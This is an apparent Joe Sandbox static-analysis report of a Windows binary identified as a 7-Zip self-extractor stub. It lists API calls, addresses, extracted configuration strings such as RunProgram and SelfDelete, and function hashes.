??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
_wtol.MSVCRT ref: 00405217
??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F

Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC

Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953

??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519

Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569

Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6

wsprintfW.USER32 ref: 00405595
_wtol.MSVCRT ref: 004057DE
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
CoInitialize.OLE32(00000000), ref: 004059E9
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
GetKeyState.USER32(00000010), ref: 00405AA1
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
memset.MSVCRT ref: 004060AE
ShellExecuteExW.SHELL32(?), ref: 0040617E
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB

Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
_wtol.MSVCRT ref: 00405F65
??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C

Strings

GUIMode, xrefs: 004056FF
sfxversion, xrefs: 004050D6
sfxconfig, xrefs: 0040527C, 00405488
ExecuteParameters, xrefs: 0040605D
HelpText, xrefs: 0040595E
7-Zip SFX, xrefs: 00406490
4AA, xrefs: 0040504C
x86, xrefs: 00405FBE
SetEnvironment, xrefs: 0040586E, 0040591F
FinishMessage, xrefs: 00406399
x64, xrefs: 00405FF7
IA, xrefs: 004055D2, 004058FB
@DA, xrefs: 00405699
Delete, xrefs: 00406352
;!@Install@!UTF-8!, xrefs: 00405436
AutoInstall, xrefs: 00405AC1, 00405B1C, 00405ECC
BeginPrompt, xrefs: 00405A71
SelfDelete, xrefs: 0040577C, 0040640B
4DA, xrefs: 00406034
7ZipSfx.%03x, xrefs: 00405C77
;!@InstallEnd@!, xrefs: 00405431
InstallPath, xrefs: 004059F3
i386, xrefs: 00405FD1
forcenowait, xrefs: 00405F25
OverwriteMode, xrefs: 004056BB
amd64, xrefs: 00405FE4
GUIFlags, xrefs: 0040571F
ExecuteFile, xrefs: 00405A61, 00405B47, 00405B55
shc, xrefs: 00405F7A
Sorry, this program requires Microsoft Windows 2000 or later., xrefs: 00406495
Shortcut, xrefs: 0040632A
del, xrefs: 00405F9A
MiscFlags, xrefs: 0040573F
setup.exe, xrefs: 00405DE5, 00405DEA, 00405E45
7zSfxString%d, xrefs: 0040558F
nowait, xrefs: 00405F03
RunProgram, xrefs: 00405A66, 00405B6B, 00405B79
hidcon, xrefs: 00405E5E
XpA, xrefs: 00405581

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
API String ID: 154539431-3058303289
Opcode ID: 08cc341054d9ac392e10eec1814b986470a164428fc6d59b7780bfb12bfe5330
Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
Opcode Fuzzy Hash: 08cc341054d9ac392e10eec1814b986470a164428fc6d59b7780bfb12bfe5330
Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

Function 00401F9D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 150
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
wsprintfW.USER32 ref: 00401FFD
GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
GetLastError.KERNEL32 ref: 00402017
??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
GetLastError.KERNEL32 ref: 0040204C
lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
SetLastError.KERNEL32(00000000), ref: 00402098
lstrlenA.KERNEL32(00413FD0), ref: 004020CC
??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
_wtol.MSVCRT ref: 0040212A
MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A

Strings

XpA, xrefs: 00401FB4
\3A, xrefs: 00401FDB
7zSfxString%d, xrefs: 00401FF7

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
String ID: 7zSfxString%d$XpA$\3A
API String ID: 2117570002-3108448011
Opcode ID: cea23e979b19b2ff836b241653c9f6f8570cf5dd123790f9bfcb5a4633df1eb3
Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
Opcode Fuzzy Hash: cea23e979b19b2ff836b241653c9f6f8570cf5dd123790f9bfcb5a4633df1eb3
Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18

Function 00401626 Relevance: 22.8, APIs: 15, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e760e0c93036b197ddb3347365287eb95cb0b537a0f60c0ca06529ee100f634d
Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
Opcode Fuzzy Hash: e760e0c93036b197ddb3347365287eb95cb0b537a0f60c0ca06529ee100f634d
Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

Function 0040301A Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
SetLastError.KERNEL32(00000010), ref: 0040303D

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E

Function 0040118A Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
SendMessageW.USER32(00008001,00000000,?), ref: 004011FF

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: DiskFreeMessageSendSpace
String ID:
API String ID: 696007252-0
Opcode ID: 7556ddfb68cb10f5cb29c3a6588dee5ba643ce1babce3ea88c9fd262dc76ef2b
Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
Opcode Fuzzy Hash: 7556ddfb68cb10f5cb29c3a6588dee5ba643ce1babce3ea88c9fd262dc76ef2b
Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

Function 00411DEF Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 00411E1C
__p__fmode.MSVCRT ref: 00411E31
__p__commode.MSVCRT ref: 00411E3F
__setusermatherr.MSVCRT ref: 00411E6B
_initterm.MSVCRT ref: 00411E81
__getmainargs.MSVCRT ref: 00411EA4
_initterm.MSVCRT ref: 00411EB4
GetStartupInfoA.KERNEL32(?), ref: 00411EF3
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00411F17
exit.KERNELBASE ref: 00411F27
_XcptFilter.MSVCRT ref: 00411F39

Strings

HpA, xrefs: 00411E9C, 00411E9F

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID: HpA
API String ID: 801014965-2938899866
Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

Function 00401B37 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
DispatchMessageW.USER32(?), ref: 00401B89
KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99

Strings

Static, xrefs: 00401B5A

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
String ID: Static
API String ID: 2479445380-2272013587
Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

Function 0040B163 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298

Strings

, xrefs: 0040B22D

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@memcpymemmove
String ID:
API String ID: 3549172513-3916222277
Opcode ID: b801c6dde5252ceaa95e99b7edc6e22ccd73079f9f68863dc15d2a8854d6de70
